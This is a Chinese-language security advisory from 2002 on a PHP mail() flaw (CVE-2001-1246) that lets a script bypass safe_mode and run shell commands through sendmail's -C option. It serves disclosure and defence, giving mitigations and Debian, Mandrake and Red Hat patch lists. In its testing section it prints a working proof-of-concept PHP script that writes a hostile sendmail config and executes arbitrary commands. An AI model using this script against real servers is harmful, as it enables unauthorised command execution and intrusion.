首页 -> 安全研究
安全研究
安全漏洞
PHP mail函数绕过safe_mode限制执行命令漏洞
发布日期:2002-08-23
更新日期:2002-08-27
受影响系统:
PHP PHP 4.2.2描述:
PHP PHP 4.2.1
PHP PHP 4.2.0
PHP PHP 4.1.2
PHP PHP 4.1.1
PHP PHP 4.1.0
PHP PHP 4.1
PHP PHP 4.0.7
PHP PHP 4.0.6
PHP PHP 4.0.5
BUGTRAQ ID: 2954
CVE(CAN) ID: CVE-2001-1246
PHP是一种流行的WEB服务器端编程语言,它功能强大,简单易用,在很多Unix操作系统默认都安装了PHP, 它也可以在Windows系统下运行。
PHP函数mail的第五个参数存在漏洞,远程攻击者可能利用此漏洞结构CGI脚本中的漏洞绕过PHP的safe_mode的限制执行系统命令。
从PHP-4.0.5开始,mail函数引入了第五个参数。去年被发现该参数没有很好过滤shell字符使得可以绕过safe_mode的限制执行系统命令。( http://www.nsfocus.com/index.php?act=sec_bug&do=view&bug_id=1593 )该漏洞在PHP-4.0.6被修复。
然而,PHP的mail函数仍然存在漏洞。mail函数的第五个参数可以在发送mail的时候给MTA(php.ini的sendmail_path设定,默认都是sendmail)传递额外的选项参数,sendmail的-Cfile选项能够改变配置文件,利用sendmail的特性,我们可以在配置文件里指定执行命令,从而使得PHP的mail函数绕过safe_mode的限制来执行任意系统命令。
<*来源:Wojciech Purczynski (cliph@isec.pl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103011916928204&w=2
https://www.redhat.com/support/errata/RHSA-2002-102.html
http://www.debian.org/security/2002/dsa-168
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-059.php
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
- -----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
- -----8<----- bypass_safe_mode.php -----8<-----
为了达到测试效果,在使用sendmail、开启safe_mode的PHP环境下执行,并且php脚本的属主要和启动WEB Server的用户一致,否则在safe_mode模式下由于脚本的属主和操作文件的属主不同而发生冲突。
可以用其它命令替换rm -f $script $cf;或在后面追加多个命令,用分号隔开。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 如果您的主机有其它Web用户可以建立PHP脚本,请在php.ini里暂时关闭mail函数:
disable_functions = mail
然后重启WEB Server。
* 使用PHP的最新CVS代码重新编译PHP。
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-168-1)以及相应补丁:
DSA-168-1:New PHP packages fix several vulnerabilities
链接:http://www.debian.org/security/2002/dsa-168
补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.dsc
Size/MD5 checksum: 1079 82d2b9adff31130eafe78fe9c647d098
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.diff.gz
Size/MD5 checksum: 39264 e44f4917ce887f53ac7019ab4e3692ba
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18.orig.tar.gz
Size/MD5 checksum: 2203818 da541ac71d951c47a011ceb26664ba2d
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.dsc
Size/MD5 checksum: 1125 e9b5dbf3554c63dd654e69c83da63a97
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.diff.gz
Size/MD5 checksum: 134587 9a862082a0b60f6e2f0fa9c993d3ff19
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1.orig.tar.gz
Size/MD5 checksum: 2214630 e65b706a7fc4469d1ccd564ef8a2c534
Alpha architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_alpha.deb
Size/MD5 checksum: 438822 748bb657dff328c22920c186e2ab83a1
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_alpha.deb
Size/MD5 checksum: 619332 e9dca7c64949f2d635ff5ed7da682c5d
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_alpha.deb
Size/MD5 checksum: 520090 76a0ac1f943c108f28a4238723415367
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_alpha.deb
Size/MD5 checksum: 868874 b8041d6976c11fbb63d0481869351658
ARM architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_arm.deb
Size/MD5 checksum: 379276 3900254a218ea8b08f12adcee5826978
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_arm.deb
Size/MD5 checksum: 490638 de60ee781cd3e2dc820fef82a1fe08a8
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_i386.deb
Size/MD5 checksum: 359858 6ee0615cac086a0da432ed40e0edab68
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_i386.deb
Size/MD5 checksum: 458174 be4d1d9c54ba0207f39dedfaaaa7d748
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_i386.deb
Size/MD5 checksum: 412254 37751e39ac9688d17965cf947ed7f6fc
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_i386.deb
Size/MD5 checksum: 635076 b1dfc5587ea2719ff5a789fc02bc27ec
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_m68k.deb
Size/MD5 checksum: 355170 9b7fef1df1cc28988eb3f7fdde94dd61
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_m68k.deb
Size/MD5 checksum: 429244 1aec470dce3cc9babe341661c7023281
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_m68k.deb
Size/MD5 checksum: 408462 29b1bc7739a65d4ebd95d848bccbaf5c
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_m68k.deb
Size/MD5 checksum: 592990 2d3fbdc339ba1692d1c7e98fc50b9920
PowerPC architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_powerpc.deb
Size/MD5 checksum: 380012 c2990c5ec38b1fc4d218a51c750f9963
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_powerpc.deb
Size/MD5 checksum: 492568 eebeab3f920fad4812f418045750a489
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_powerpc.deb
Size/MD5 checksum: 451892 54e8183df00abee5c8498b4caed0a679
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_powerpc.deb
Size/MD5 checksum: 689728 bd2aeebd0605f35395106a4ce0c76cef
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_sparc.deb
Size/MD5 checksum: 371252 f3a0fb13377a8b5b67a851d2c204b87d
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_sparc.deb
Size/MD5 checksum: 483476 e749a895f8e9d429d7e3d6eb0f35a945
http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_sparc.deb
Size/MD5 checksum: 435060 be65d0d8c66e0bdcf5aa3a337a019ea6
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_sparc.deb
Size/MD5 checksum: 665368 2670abfe8104e7b93ce3eb82f82783ef
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1.dsc
Size/MD5 checksum: 1113 defbd05ac28342105ddf3c40287c5d83
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1.diff.gz
Size/MD5 checksum: 56097 8b4c799d1802043c427c4072a8426370
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18.orig.tar.gz
Size/MD5 checksum: 2203818 da541ac71d951c47a011ceb26664ba2d
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5.dsc
Size/MD5 checksum: 1555 d499095a9ce5eaaa742c5e255935b162
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5.diff.gz
Size/MD5 checksum: 87169 28eefab5c9a744844c99c5634512d21d
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2.orig.tar.gz
Size/MD5 checksum: 3346579 37e67552bec20e6f02d52e14a11aa269
Alpha architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_alpha.deb
Size/MD5 checksum: 401238 8586e692ca92764162cf70df945be846
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_alpha.deb
Size/MD5 checksum: 617530 cbf6b0a9ef2f301dc59a0769e801be13
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_alpha.deb
Size/MD5 checksum: 712770 91e0fce43423f80bd88e6578e161ea6a
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_alpha.deb
Size/MD5 checksum: 694394 97ae10670e4f0fe04ccfb61effaadba1
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_alpha.deb
Size/MD5 checksum: 1292980 3ab48b33724395b5dc647928e1cbe307
ARM architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_arm.deb
Size/MD5 checksum: 371882 057479ece77bd2fa7852397d0a6e9747
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_arm.deb
Size/MD5 checksum: 494742 93b09582be5f56755c0e214e0a68d534
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_arm.deb
Size/MD5 checksum: 652346 fc06fdf3679e7282fb0f0a9319589604
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_arm.deb
Size/MD5 checksum: 625852 7171107322617498e3e153aae73ba21f
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_arm.deb
Size/MD5 checksum: 1076126 96ce32ae8083cce65c508f320a238c29
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_i386.deb
Size/MD5 checksum: 361032 ac76b9d6c6fd1077a3a45f948f099e96
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_i386.deb
Size/MD5 checksum: 461052 cb86db223af4f7a46801b44fd83a1a3d
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_i386.deb
Size/MD5 checksum: 597540 eacc0fd36d2d564cdb086542e05edb25
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_i386.deb
Size/MD5 checksum: 582018 b012d4f2cf0778f5156e27062cc01436
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_i386.deb
Size/MD5 checksum: 990122 89904ac6614f385d319cecc599501e3e
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_ia64.deb
Size/MD5 checksum: 484866 ebc82ed226f7529b076224645af18485
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_ia64.deb
Size/MD5 checksum: 753408 53354e05af67a4297c056545855e20fc
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_ia64.deb
Size/MD5 checksum: 919602 f3c837dc49eaf6c2e39dd2292d851142
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_ia64.deb
Size/MD5 checksum: 888678 1a01c7e9bbb8341e7c3b3741bd86d3aa
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_ia64.deb
Size/MD5 checksum: 1600476 8f19c0af9708e53c6532645e4c886ef1
HP Precision architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_hppa.deb
Size/MD5 checksum: 404392 9835e7434e1948ef9c2250f079993715
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_hppa.deb
Size/MD5 checksum: 567200 5db5b1b5b3f7aa14f4a8d12863c156f1
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_hppa.deb
Size/MD5 checksum: 756828 2f6dad96f5f72a162552fbbc910f0a9b
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_hppa.deb
Size/MD5 checksum: 733924 e1b0b805d489f0315aeda262bcff2e9e
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_hppa.deb
Size/MD5 checksum: 1211938 cc1f5afd4421b45f89fe9e845645ad69
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_m68k.deb
Size/MD5 checksum: 357180 d7907f7aa2b5004e99b30ad8f61d304a
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_m68k.deb
Size/MD5 checksum: 432586 e97d5d0aaa7add1be1131db274e80520
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_m68k.deb
Size/MD5 checksum: 580528 f285c81661ec9c306f28cec5a2018f22
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_m68k.deb
Size/MD5 checksum: 572374 0bed8e2be0fabc5d25c3868c9b374a2f
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_m68k.deb
Size/MD5 checksum: 932280 2b2edee95d27b9e72f6c4087b0e92b9f
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_mips.deb
Size/MD5 checksum: 363314 db293eaf7b775ed38ebf3642a1fad145
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_mips.deb
Size/MD5 checksum: 509394 13cb1c6fb08b570eeb2ca9fb5b81c20e
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_mips.deb
Size/MD5 checksum: 614724 432bfb1730842f7a858e9336af0436b6
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_mips.deb
Size/MD5 checksum: 606654 b19a832117357ca211e9cfbeabc8153c
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_mips.deb
Size/MD5 checksum: 1095146 c28c09e8f6f7c06d456071d055430eac
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_mipsel.deb
Size/MD5 checksum: 362218 dc30c2f819623b5340a00e920f10f790
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_mipsel.deb
Size/MD5 checksum: 507712 a5f46c32f5da4bd0d6578cb387948094
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_mipsel.deb
Size/MD5 checksum: 609260 5eec777e950f7dc7bfe0042367e4109f
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_mipsel.deb
Size/MD5 checksum: 602190 be8c7a63af072069984092434778b63a
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_mipsel.deb
Size/MD5 checksum: 1089242 7b160f6ea1df6567c66914e466c0c3a2
PowerPC architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_powerpc.deb
Size/MD5 checksum: 376530 6192fa01d1af74c451b9aaf3470ff857
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_powerpc.deb
Size/MD5 checksum: 496076 1391775799a9cc8f09ea255f75310d0e
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_powerpc.deb
Size/MD5 checksum: 652486 6e5dc8f02eee61bee99427a4f1bd014e
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_powerpc.deb
Size/MD5 checksum: 637170 47de6b9690e3f19736e61643b32d1208
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_powerpc.deb
Size/MD5 checksum: 1070680 7621d9244328daad7bd9f7d6a9060076
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_s390.deb
Size/MD5 checksum: 371208 a86144204858b5af173a234428e28b44
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_s390.deb
Size/MD5 checksum: 466596 1754b68279b062b4672c1f1ea967dec9
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_s390.deb
Size/MD5 checksum: 630600 3314fd48a26554070d683531509fa805
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_s390.deb
Size/MD5 checksum: 622616 763bdd50ed1f48194fca4e40d69c0cb9
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_s390.deb
Size/MD5 checksum: 1000670 ae235537507a7cae42055c66e0dbab72
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_sparc.deb
Size/MD5 checksum: 374664 30080342e0bac88b49f08d41a4454d29
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_sparc.deb
Size/MD5 checksum: 489124 f50f94c018b0f3b59684edf7fdb1becc
http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-5_sparc.deb
Size/MD5 checksum: 629056 1504b0dfe0bbfe5d2da939d4c7cdcd18
http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-5_sparc.deb
Size/MD5 checksum: 614222 0c5cc999484624f6be5caadfee833490
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-5_sparc.deb
Size/MD5 checksum: 1032494 b7fae376a617c97dc95724f16ce4b82c
Please note that the source packages mentioned above produce more
binary packages than the ones listed above. They are not relevant
for the fixed problems, though.
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
MandrakeSoft
------------
MandrakeSoft已经为此发布了一个安全公告(MDKSA-2002:059)以及相应补丁:
MDKSA-2002:059:php
链接:http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-059.php
补丁下载:
Updated Packages:
Linux-Mandrake 7.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/php-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/php-common-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/php-devel-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/SRPMS/php-4.0.6-6.4mdk.src.rpm
Linux-Mandrake 7.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/php-4.0.6-6.3mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/php-common-4.0.6-6.3mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/php-devel-4.0.6-6.3mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/SRPMS/php-4.0.6-6.3mdk.src.rpm
Mandrake Linux 8.0:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/php-4.0.6-6.2mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/php-common-4.0.6-6.2mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/php-devel-4.0.6-6.2mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/SRPMS/php-4.0.6-6.2mdk.src.rpm
Mandrake Linux 8.0/ppc:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/php-4.0.6-6.2mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/php-common-4.0.6-6.2mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/php-devel-4.0.6-6.2mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/SRPMS/php-4.0.6-6.2mdk.src.rpm
Mandrake Linux 8.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/php-4.0.6-6.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/php-common-4.0.6-6.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/php-devel-4.0.6-6.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/php-4.0.6-6.1mdk.src.rpm
Mandrake Linux 8.1/ia64:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/php-4.0.6-6.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/php-common-4.0.6-6.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/php-devel-4.0.6-6.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/SRPMS/php-4.0.6-6.1mdk.src.rpm
Corporate Server 1.0.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/php-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/php-common-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/php-devel-4.0.6-6.4mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/SRPMS/php-4.0.6-6.4mdk.src.rpm
上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
http://www.mandrakesecure.net/en/ftp.php
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.php.net
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2002:102-26)以及相应补丁:
RHSA-2002:102-26:New PHP packages fix vulnerability in safemode
链接:https://www.redhat.com/support/errata/RHSA-2002-102.html
补丁下载:
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/php-4.1.2-7.0.3.src.rpm
alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/php-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-manual-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-odbc-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-imap-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-mysql-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-devel-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-snmp-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-ldap-4.1.2-7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/php-pgsql-4.1.2-7.0.3.alpha.rpm
i386:
ftp://updates.redhat.com/7.0/en/os/i386/php-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-manual-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-odbc-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-imap-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-mysql-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-devel-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-snmp-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-ldap-4.1.2-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/php-pgsql-4.1.2-7.0.3.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/php-4.1.2-7.1.3.src.rpm
alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/php-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-manual-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-odbc-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-imap-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-mysql-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-devel-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-snmp-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-ldap-4.1.2-7.1.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/php-pgsql-4.1.2-7.1.3.alpha.rpm
i386:
ftp://updates.redhat.com/7.1/en/os/i386/php-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-manual-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-odbc-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-imap-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-mysql-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-devel-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-snmp-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-ldap-4.1.2-7.1.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/php-pgsql-4.1.2-7.1.3.i386.rpm
ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/php-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-manual-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-odbc-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-imap-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-mysql-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-devel-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-snmp-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-ldap-4.1.2-7.1.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/php-pgsql-4.1.2-7.1.3.ia64.rpm
Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/php-4.1.2-7.2.3.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/php-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-manual-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-odbc-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-imap-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-mysql-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-devel-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-snmp-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-ldap-4.1.2-7.2.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/php-pgsql-4.1.2-7.2.3.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/php-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-manual-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-odbc-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-imap-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-mysql-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-devel-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-snmp-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-ldap-4.1.2-7.2.3.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/php-pgsql-4.1.2-7.2.3.ia64.rpm
Red Hat Linux 7.3:
SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/php-4.1.2-7.3.3.src.rpm
i386:
ftp://updates.redhat.com/7.3/en/os/i386/php-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-manual-4.1.2-7.3.3.i386.rpm
